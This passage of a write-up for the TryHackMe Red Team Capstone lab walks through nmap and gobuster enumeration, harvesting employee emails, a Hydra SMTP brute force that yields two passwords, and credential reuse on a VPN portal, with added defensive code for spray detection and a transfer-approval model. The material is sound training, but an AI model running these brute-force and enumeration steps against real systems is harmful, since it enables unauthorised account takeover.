TryHackMe: Red Team Capstone Challenge

The Red Team Capstone challenge from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact. To best simulate how these engagements usually occur, there is no single right answer. Instead, multiple paths can be used to achieve the final goal.

Tested Learning Objectives

To solve this challenge successfully, the skills listed below are prerequisites.

  • OSINT (Simulated)
  • Enumeration & Fuzzing
  • Phishing
  • AV Evasion
  • Lateral Movement
  • AD Exploitation
  • Linux and Windows Security Testing
  • Privilege Escalation
  • Post-Compromise Exploitation

Project Overview

TryHackMe, a cybersecurity consultancy firm, has been approached by the government of Trimento to perform a red team engagement against their Reserve Bank (TheReserve). 

Trimento is an island country situated in the Pacific. While it may be small in size, it is by no means poor, thanks to foreign investment. Its reserve bank has two main divisions:

  • Corporate – The reserve bank of Trimento allows foreign investments, so they have a department that takes care of the country’s corporate banking clients.
  • Bank – The reserve bank of Trimento is in charge of the core banking system in the country, which connects to other banks around the world.

The Trimento government has stated that the assessment will cover the entire reserve bank, including both its perimeter and internal networks. They are concerned that the corporate division, while boosting the economy, may be endangering the core banking system due to insufficient segregation. The outcome of this red team engagement will determine whether the corporate division should be spun off into its own company.

Project Goal

The purpose of this assessment is to evaluate whether the corporate division can be compromised and, if so, determine if it could compromise the bank division. A simulated fraudulent money transfer must be performed to fully demonstrate the compromise.

To do this safely, TheReserve will create two new core banking accounts for you. You will need to demonstrate that it’s possible to transfer funds between these two accounts. The only way this is possible is by gaining access to SWIFT, the core backend banking system.

Note: SWIFT (Society for Worldwide Interbank Financial Telecommunications) is the actual system that is used by banks for backend transfers. In this assessment, a core backend system has been created. However, for security reasons, intentional inaccuracies have been introduced into this process. If you wish to learn more about actual SWIFT and its security, feel free to go do some research! To put it in other words, the information that follows here has been made up.

To help you understand the project goal, the government of Trimento has shared some information about the SWIFT backend system. SWIFT runs in an isolated secure environment with restricted access. While the word impossible should not be used lightly, the likelihood of the compromise of the actual hosting infrastructure is so slim that it is fair to say that it is impossible to compromise this infrastructure.

However, the SWIFT backend exposes an internal web application at http://swift.bank.thereserve.loc/, which TheReserve uses to facilitate transfers. The government has provided a general process for transfers. To transfer funds:

  1. A customer makes a request that funds should be transferred and receives a transfer code.
  2. The customer contacts the bank and provides this transfer code.
  3. An employee with the capturer role authenticates to the SWIFT application and captures the transfer.
  4. An employee with the approver role reviews the transfer details and, if verified, approves the transfer. This has to be performed from a jump host.
  5. Once approval for the transfer is received by the SWIFT network, the transfer is facilitated and the customer is notified.

Separation of duties is performed to ensure that no single employee can both capture and approve the same transfer.
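The five-step process above is a classic four-eyes control, and the engagement goal is to show it can be subverted. To make the control concrete, here is an added illustration in Python that models the capture/approve workflow and rejects the two violations the process is meant to prevent (the capturer approving their own transfer, and an approval that does not originate from the jump host). This is not the room's code or anything from TheReserve; the class names, the "capturer"/"approver" role strings and the from_jump_host flag are assumptions made for this example.

```python
"""Model of the capture/approve transfer workflow described above.

Added illustration, not part of the TryHackMe room. All names here
(Transfer, TransferLedger, the "capturer"/"approver" role strings and the
from_jump_host flag) are assumptions made for this example.
"""
from dataclasses import dataclass, field
from typing import Dict, Optional, Set


class WorkflowError(Exception):
    """Raised when a step violates one of the transfer controls."""


@dataclass
class Transfer:
    code: str                      # transfer code handed to the customer
    amount: int
    captured_by: Optional[str] = None
    approved_by: Optional[str] = None

    @property
    def state(self) -> str:
        if self.approved_by:
            return "approved"
        if self.captured_by:
            return "captured"
        return "requested"


@dataclass
class TransferLedger:
    roles: Dict[str, Set[str]]     # user -> roles; constructed sample directory
    transfers: Dict[str, Transfer] = field(default_factory=dict)

    def request(self, code: str, amount: int) -> Transfer:
        """Step 1: the customer requests a transfer and receives a code."""
        transfer = Transfer(code, amount)
        self.transfers[code] = transfer
        return transfer

    def capture(self, code: str, user: str) -> Transfer:
        """Step 3: a capturer records the transfer against its code."""
        transfer = self.transfers[code]
        if "capturer" not in self.roles.get(user, set()):
            raise WorkflowError(f"{user} lacks the capturer role")
        if transfer.state != "requested":
            raise WorkflowError(f"transfer {code} is already {transfer.state}")
        transfer.captured_by = user
        return transfer

    def approve(self, code: str, user: str, from_jump_host: bool) -> Transfer:
        """Step 4: an approver, working from the jump host, releases it."""
        transfer = self.transfers[code]
        if "approver" not in self.roles.get(user, set()):
            raise WorkflowError(f"{user} lacks the approver role")
        if transfer.state != "captured":
            raise WorkflowError(f"transfer {code} is {transfer.state}, not captured")
        if not from_jump_host:
            raise WorkflowError("approvals are only accepted from the jump host")
        # Separation of duties: whoever captured a transfer can never approve
        # that same transfer, even if the account holds both roles.
        if transfer.captured_by == user:
            raise WorkflowError(f"{user} captured {code} and cannot approve it")
        transfer.approved_by = user
        return transfer


def demo() -> Dict[str, str]:
    """Exercise the happy path and two control violations; return outcomes."""
    ledger = TransferLedger(roles={
        "capturer.one": {"capturer"},
        "approver.one": {"approver"},
        "both.roles": {"capturer", "approver"},
    })
    outcomes: Dict[str, str] = {}

    ledger.request("TX-1", 100)
    ledger.capture("TX-1", "capturer.one")
    outcomes["four_eyes"] = ledger.approve("TX-1", "approver.one", True).state

    ledger.request("TX-2", 100)
    ledger.capture("TX-2", "both.roles")
    try:
        ledger.approve("TX-2", "both.roles", True)
        outcomes["same_user"] = "approved"
    except WorkflowError:
        outcomes["same_user"] = "blocked"

    ledger.request("TX-3", 100)
    ledger.capture("TX-3", "capturer.one")
    try:
        ledger.approve("TX-3", "approver.one", False)
        outcomes["off_jump_host"] = "approved"
    except WorkflowError:
        outcomes["off_jump_host"] = "blocked"
    return outcomes


if __name__ == "__main__":
    print(demo())
```

The point of the model is that the control is enforced on the transfer record, not on the role assignment: an account holding both roles is still blocked from approving what it captured, which is exactly the property an attacker who has compromised one capturer and one approver account is trying to get around.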

Project Scope

This section details the project scope.

In-Scope

  • Security testing of TheReserve’s internal and external networks, including all IP ranges accessible through your VPN connection.
  • OSINTing of TheReserve’s corporate website, which is exposed on the external network of TheReserve. Note that this means all OSINT activities should be limited to the provided network subnet; no external internet OSINTing is required.
  • Phishing of any of the employees of TheReserve.
  • Attacking the mailboxes of TheReserve employees on the WebMail host (.11).
  • Using any attack methods to complete the goal of performing the transaction between the provided accounts.

Out-of-Scope

  • Security testing of any sites not hosted on the network.
  • Security testing of the TryHackMe VPN (.250) and scoring servers, or attempts to attack any other user connected to the network.
  • Any security testing on the WebMail server (.11) that alters the mail server configuration or its underlying infrastructure.
  • Attacking the mailboxes of other red teamers on the WebMail portal (.11).
  • External (internet) OSINT gathering.
  • Attacking any hosts outside of the provided subnet range. Once you have completed the questions below, your subnet will be displayed in the network diagram. This 10.200.X.0/24 network is the only in-scope network for this challenge.
  • Conducting DoS attacks or any attack that renders the network inoperable for other users.

Project Registration

The Trimento government mandates that all red teamers from TryHackMe participating in the challenge must register to allow their single point of contact for the engagement to track activities. As the island’s network is segregated, this will also provide the testers access to an email account for communication with the government and an approved phishing email address, should phishing be performed.

To register, you need to get in touch with the government through its e-Citizen communication portal that uses SSH for communication. Here are the SSH details provided:

SSH Username: e-citizen
SSH Password: stabilitythroughcurrency
SSH IP: X.X.X.250

Once you complete the questions below, the network diagram at the start of the room will show the IP specific to your network. Use that information to replace the X values in your SSH IP.

Once you authenticate, you will be able to communicate with the e-Citizen system. Follow the prompts to register for the challenge, and save the information you get for future reference. Once registered, follow the instructions to verify that you have access to all the relevant systems.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ ssh e-citizen@10.200.113.250
e-citizen@10.200.113.250's password: 

Welcome to the e-Citizen platform!
Please make a selection:
[1] Register
[2] Authenticate
[3] Exit
Selection:1

Please provide your THM username: ishsome36
Creating email user
User has been succesfully created


=======================================
Thank you for registering on e-Citizen for the Red Team engagement against TheReserve.
Please take note of the following details and please make sure to save them, as they will not be displayed again.
=======================================
Username: ishsome36
Password: tZ1Zl-HpHts8F82Y
MailAddr: ishsome36@corp.th3reserve.loc
IP Range: 10.200.113.0/24
=======================================

The VPN server and the e-Citizen platform are not in scope for this assessment, and any security testing of these systems may lead to a ban from the challenge.

As you make your way through the network, you will need to prove your compromises. To do that, you will be requested to perform specific steps on the host that you have compromised. Please note the hostnames in the network diagram above, as you will need this information. Flags can only be accessed from matching hosts, so even if you have higher access, you will need to lower your access to the specific host required to submit the flag.

Submitting the Flags

To submit the proof of compromise, connect to the e-citizen platform via SSH and select option 2 to authenticate. Use the credentials provided during the registration to authenticate. After successfully authenticating, you will see more options.

We need to select the option that matches the host we compromised. For example, selecting option [1] prompts for the hostname we compromised, and the instructions that follow explain how to submit the proof of compromise. Once the proof is submitted, the flag value arrives in our email.

If you don’t want to set up an email client, you can make use of the Roundcube Webmail app at http://mail.thereserve.loc/index.php and use the credentials provided during registration to log in.

Once the registration part is done, we can see the hosts and their IP addresses show up on the network diagram.

Let’s add these hosts to our /etc/hosts file.

10.200.113.250 ecitizen.thm
10.200.113.13 web.thereserve.loc
10.200.113.12 vpn.thereserve.loc
10.200.113.11 mail.thereserve.loc

Exploiting the External Network

OSINT on WEB Machine

We will start by running an NMAP scan on the machine to find open ports and services running.

NMAP

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fe:ee:07:c6:b9:a4:90:5f:ca:71:c8:b6:7b:71:f7:ac (RSA)
|   256 ca:9d:c8:e4:62:24:56:b2:f6:52:de:de:57:63:ab:fe (ECDSA)
|_  256 7d:21:b1:c5:04:65:2a:ba:18:20:3c:d2:1d:e4:16:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have only two ports open:

  • 22 for SSH
  • 80 for HTTP

Since we do not have credentials to connect via SSH, we can move on to enumerating the web server on port 80.

HTTP

The landing page is the homepage of TheReserve Bank of Trimento. The Meet The Team tab lists some of the bank's employees.

By opening one of the pictures in a new tab, we see the naming convention of the (potential) domain users.

If we browse to the /images directory, we can see a list of all the users.

Based on this list, we can create a user list that we can use later to enumerate or carry out other attacks such as password spraying and brute-forcing.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ cat emails.txt    
antony.ross@corp.thereserve.loc
ashley.chan@corp.thereserve.loc
brenda.henderson@corp.thereserve.loc
charlene.thomas@corp.thereserve.loc
christopher.smith@corp.thereserve.loc
emily.harvey@corp.thereserve.loc
keith.allen@corp.thereserve.loc
laura.wood@corp.thereserve.loc
leslie.morley@corp.thereserve.loc
lynda.gordon@corp.thereserve.loc
martin.savage@corp.thereserve.loc
mohammad.ahmed@corp.thereserve.loc
paula.bailey@corp.thereserve.loc
rhys.parsons@corp.thereserve.loc
roy.sims@corp.thereserve.loc

The Contact Us page lists a couple more usernames; we add them to our list as well.

We have gathered some useful data from the web server. The usernames/emails could be domain users and we can use them on other machines to perform different attacks.

Mail Machine

We will again start by running NMAP on this machine. From the network diagram, we can see that this is a Windows host joined directly to the domain. If we can enumerate it and gather any interesting information, we may be able to get a foothold on the network.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone/Mail]
└─$ nmap -p- mail.thereserve.loc -A nmap/mail-fullscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 11:14 CST
Unable to split netmask from target expression: "nmap/mail-fullscan"
Nmap scan report for mail.thereserve.loc (10.200.113.11)
Host is up (0.21s latency).
Not shown: 65513 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 f3:6c:52:d2:7f:e9:0e:1c:c1:c7:ac:96:2c:d1:ec:2d (RSA)
|   256 c2:56:3c:ed:c4:b0:69:a8:e7:ad:3c:31:05:05:e9:85 (ECDSA)
|_  256 d3:e5:f0:73:75:d5:20:d9:c0:bb:41:99:e7:af:a0:00 (ED25519)
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 403 - Forbidden: Access is denied.
110/tcp   open  pop3          hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open  imap          hMailServer imapd
|_imap-capabilities: NAMESPACE IDLE completed CAPABILITY IMAP4 SORT QUOTA CHILDREN RIGHTS=texkA0001 ACL OK IMAP4rev1
445/tcp   open  microsoft-ds?
587/tcp   open  smtp          hMailServer smtpd
| smtp-commands: MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3306/tcp  open  mysql         MySQL 8.0.31
| ssl-cert: Subject: commonName=MySQL_Server_8.0.31_Auto_Generated_Server_Certificate
| Not valid before: 2023-01-10T07:46:11
|_Not valid after:  2033-01-07T07:46:11
|_ssl-date: TLS randomness does not represent time
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.31
|   Thread ID: 83
|   Capabilities flags: 65535
|   Some Capabilities: SwitchToSSLAfterHandshake, Speaks41ProtocolNew, SupportsCompression, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, IgnoreSpaceBeforeParenthesis, ODBCClient, FoundRows, IgnoreSigpipes, Support41Auth, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, LongColumnFlag, LongPassword, ConnectWithDatabase, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: \x0D&QZ\x10\x05:S\x0Bl]-b\x0E7\x1C,\8\x1D
|_  Auth Plugin Name: caching_sha2_password
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THERESERVE
|   NetBIOS_Domain_Name: THERESERVE
|   NetBIOS_Computer_Name: MAIL
|   DNS_Domain_Name: thereserve.loc
|   DNS_Computer_Name: MAIL.thereserve.loc
|   DNS_Tree_Name: thereserve.loc
|   Product_Version: 10.0.17763
|_  System_Time: 2024-02-06T17:42:18+00:00
| ssl-cert: Subject: commonName=MAIL.thereserve.loc
| Not valid before: 2024-02-04T20:25:58
|_Not valid after:  2024-08-05T20:25:58
|_ssl-date: 2024-02-06T17:42:28+00:00; -1s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe: 
|     Invalid message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94SVN%I=7%D=2/6%Time=65C26F44%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\
SF:0\0\x0b\x08\x05\x1a\0")%r(HTTPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(RTSPRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(DNSVersionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05
SF:\x1a\0")%r(DNSStatusRequestTCP,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0
SF:\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(SSLSes
SF:sionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'
SF:\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie,9,"\x05\
SF:0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,"\x05\0\
SF:0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e
SF:\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(Fo
SF:urOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,9,"\x05\0
SF:\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a
SF:\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000"
SF:)%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0
SF:\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a
SF:\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\
SF:x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20mess
SF:age\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSReque
SF:st,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,32,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16Invalid\x20message-frame
SF:\.\"\x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: Host: MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-02-06T17:42:19
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Quite a few ports are open, but the following are the most interesting to us:

  • 22 for SSH
  • 25/587 SMTP
  • 139/445 for SMB
  • 80 for HTTP
  • 3389 for RDP
  • 33060 for MySQL

We will need credentials to interact with most of the open services. Let’s start with HTTP and see what is running on it.

HTTP

Browsing to the FQDN, we get a 403 Forbidden status.

Using the IP address instead, we see the default page of the Microsoft IIS server. This does not mean there is nothing else to explore: the web server may have hidden directories that we can enumerate with tools like GoBuster.

GoBuster

GoBuster was able to find some hidden directories. The /index.php page has a login page for the Roundcube Webmail app.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ gobuster dir -u http://mail.thereserve.loc -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://mail.thereserve.loc
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 5345]
/skins                (Status: 301) [Size: 156] [--> http://mail.thereserve.loc/skins/]
/plugins              (Status: 301) [Size: 158] [--> http://mail.thereserve.loc/plugins/]
/program              (Status: 301) [Size: 158] [--> http://mail.thereserve.loc/program/]
/Index.php            (Status: 200) [Size: 5345]
/vendor               (Status: 301) [Size: 157] [--> http://mail.thereserve.loc/vendor/]

RoundCube Webmail

Roundcube Webmail is a browser-based multilingual IMAP client with an application-like user interface. It provides the full functionality you expect from an email client, including MIME support, address book, folder management, message searching, and spell checking. Roundcube Webmail is written in PHP and requires the MySQL, PostgreSQL, or SQLite database. With its plugin API, it is easily extendable and the user interface is fully customizable using skins.

We only have potential usernames, so we cannot log in yet. We can try to brute-force the SMTP service with Hydra and may find matching passwords for some of the users.

SMTP Brute-Force

For this brute-force attack, we will use the password list provided to us under lab resources.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ hydra -L emails.txt -P passwords.lst mail.thereserve.loc smtp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-06 11:13:28
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 15120 login tries (l:18/p:840), ~945 tries per task
[DATA] attacking smtp://mail.thereserve.loc:25/
[STATUS] 1004.00 tries/min, 1004 tries in 00:01h, 14116 to do in 00:15h, 16 active
[STATUS] 1023.33 tries/min, 3070 tries in 00:03h, 12050 to do in 00:12h, 16 active
[STATUS] 1034.14 tries/min, 7239 tries in 00:07h, 7881 to do in 00:08h, 16 active
[25][smtp] host: mail.thereserve.loc   login: laura.wood@corp.thereserve.loc   password: Password1@
[25][smtp] host: mail.thereserve.loc   login: mohammad.ahmed@corp.thereserve.loc   password: Password1!
[STATUS] 1114.75 tries/min, 13377 tries in 00:12h, 1743 to do in 00:02h, 16 active
[STATUS] 1107.85 tries/min, 14402 tries in 00:13h, 718 to do in 00:01h, 16 active
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-06 11:27:17

Luckily, we found two sets of credentials! We can use them now and try logging in to the Webmail app. Oftentimes, getting access to user mailboxes can be very useful as there are high chances of finding sensitive information in them.
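The Hydra run above is loud: one source address fails against eighteen mailboxes at roughly a thousand attempts per minute, then suddenly authenticates. From the mail server's side that pattern is easy to pick out of the authentication log. The following added example (not part of the room, and not real hMailServer log output) parses a constructed, generic "SMTP AUTH" log format, flags any source IP that fails against several distinct accounts inside a sliding window, and records which account that IP subsequently logged in as, which is the line a SOC analyst actually cares about. The function names, the log format, the source address 10.50.0.99 and the thresholds are all assumptions.

```python
"""Detect SMTP authentication brute force / password spraying in auth logs.

Added example, not part of the TryHackMe room. The log format below is a
constructed generic one (not real hMailServer output), and the source IP
10.50.0.99 is made up; the function names and thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List

# Constructed sample: one host cycling through many mailboxes with failures,
# then succeeding, and one ordinary user who mistyped once.
SAMPLE_LOG = """\
2024-02-06 11:13:28 SMTP AUTH FAILED ip=10.50.0.99 user=antony.ross@corp.thereserve.loc
2024-02-06 11:13:29 SMTP AUTH FAILED ip=10.50.0.99 user=ashley.chan@corp.thereserve.loc
2024-02-06 11:13:29 SMTP AUTH FAILED ip=10.50.0.99 user=brenda.henderson@corp.thereserve.loc
2024-02-06 11:13:30 SMTP AUTH FAILED ip=10.50.0.99 user=charlene.thomas@corp.thereserve.loc
2024-02-06 11:13:31 SMTP AUTH FAILED ip=10.50.0.99 user=christopher.smith@corp.thereserve.loc
2024-02-06 11:13:32 SMTP AUTH FAILED ip=10.50.0.99 user=emily.harvey@corp.thereserve.loc
2024-02-06 11:13:33 SMTP AUTH OK ip=10.50.0.99 user=laura.wood@corp.thereserve.loc
2024-02-06 11:20:00 SMTP AUTH FAILED ip=10.200.113.21 user=keith.allen@corp.thereserve.loc
2024-02-06 11:20:05 SMTP AUTH OK ip=10.200.113.21 user=keith.allen@corp.thereserve.loc
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) SMTP AUTH "
    r"(?P<result>OK|FAILED) ip=(?P<ip>\S+) user=(?P<user>\S+)$"
)


def parse(lines: List[str]) -> List[dict]:
    """Turn matching log lines into event dicts; skip anything else."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")
            events.append(ev)
    return events


def detect_spray(events: List[dict], window_seconds: int = 60,
                 min_failures: int = 5, min_users: int = 3) -> List[dict]:
    """Flag a source IP that fails against many distinct accounts within a
    sliding window; record any success from that IP after the burst, which
    is the signal that a guess landed."""
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for ev in events:
        by_ip[ev["ip"]].append(ev)

    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "FAILED"]
        best = None
        start = 0
        for end in range(len(fails)):
            # shrink the window from the left until it spans <= window_seconds
            while (fails[end]["ts"] - fails[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            window = fails[start:end + 1]
            users = {e["user"] for e in window}
            if len(window) >= min_failures and len(users) >= min_users:
                if best is None or len(window) > best["failures"]:
                    best = {
                        "ip": ip,
                        "failures": len(window),
                        "distinct_users": len(users),
                        "window_end": fails[end]["ts"],
                    }
        if best is not None:
            best["succeeded_as"] = sorted(
                e["user"] for e in evs
                if e["result"] == "OK" and e["ts"] >= best["window_end"]
            )
            findings.append(best)
    return findings


def run_sample() -> List[dict]:
    """Convenience entry point over the constructed log."""
    return detect_spray(parse(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f['ip']}: {f['failures']} failures against "
              f"{f['distinct_users']} accounts, then logged in as {f['succeeded_as']}")
```

The "many users, one source" condition is what separates spraying from a single user fat-fingering their password, and the "success after the burst" field is what turns an alert into a concrete account to reset. Rate limiting or lockout per source address on ports 25, 587, 110 and 143 would have stopped the run above long before 15,120 attempts.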

Unfortunately, both user inboxes are empty. We can still make use of this access to carry out further attacks such as Phishing. We can send Phishing emails to steal sensitive information from other users such as their credentials. We can also try to catch a shell on their machine by weaponizing the Phishing email with a malicious executable payload. When the user clicks on the malicious file, we get a shell on the machine.

For now, we will move on to enumerate other machines and come back to Phishing if we can’t find a way to get a foothold on the network.

VPN Machine

Out of three hosts with potential entry points to the network, we have enumerated and gathered information from the WEB and MAIL machines. We will start an NMAP scan on the VPN machine to find out open ports and services running.

NMAP

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone/VPN]
└─$ nmap -p- vpn.thereserve.loc -A nmap/vpn-fullscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 11:58 CST
Unable to split netmask from target expression: "nmap/vpn-fullscan"
Nmap scan report for vpn.thereserve.loc (10.200.113.12)
Host is up (0.20s latency).
Not shown: 65525 closed tcp ports (conn-refused)
PORT      STATE    SERVICE  VERSION
22/tcp    open     ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:08:13:2d:6b:a2:0d:9b:97:4b:54:7e:ac:5d:29:a7 (RSA)
|   256 13:13:fb:37:7e:4e:ec:f2:b8:0e:13:74:75:32:c2:10 (ECDSA)
|_  256 de:f8:5c:79:45:d3:b2:77:0b:31:0a:7e:14:3c:82:37 (ED25519)
80/tcp    open     http     Apache httpd 2.4.29 ((Ubuntu))
|_http-title: VPN Request Portal
|_http-server-header: Apache/2.4.29 (Ubuntu)

We have only two ports open:

  • 22 for SSH
  • 80 for HTTP

Trying SSH on the VPN machine using the credentials we obtained won’t work. We will move on to Port 80.

HTTP

The web page has a login form for the VPN server. Fortunately, the credentials we have for laura.wood@thereserve.loc and mohammad.ahmed@thereserve.loc work here!

GoBuster

GoBuster found a directory, /vpn. Visiting it, we see an OpenVPN file, which we can download and read.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone/VPN]
└─$ gobuster dir -u http://vpn.thereserve.loc -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://vpn.thereserve.loc
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/vpn                  (Status: 301) [Size: 322] [--> http://vpn.thereserve.loc/vpn/]

This seems like a default template for the OpenVPN file. We cannot make use of it since there is no remote IP information so we won’t be able to connect to a VPN server.

After logging in with the credentials we found, we can type a username and click the submit button; the server returns an OpenVPN file named after the username we typed.

Comparing the downloaded file with the template, we notice that this file contains the remote IP, which means we can use it to connect to a VPN server.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone/VPN]
└─$ head corpUsername.ovpn                       
client
dev tun
proto tcp
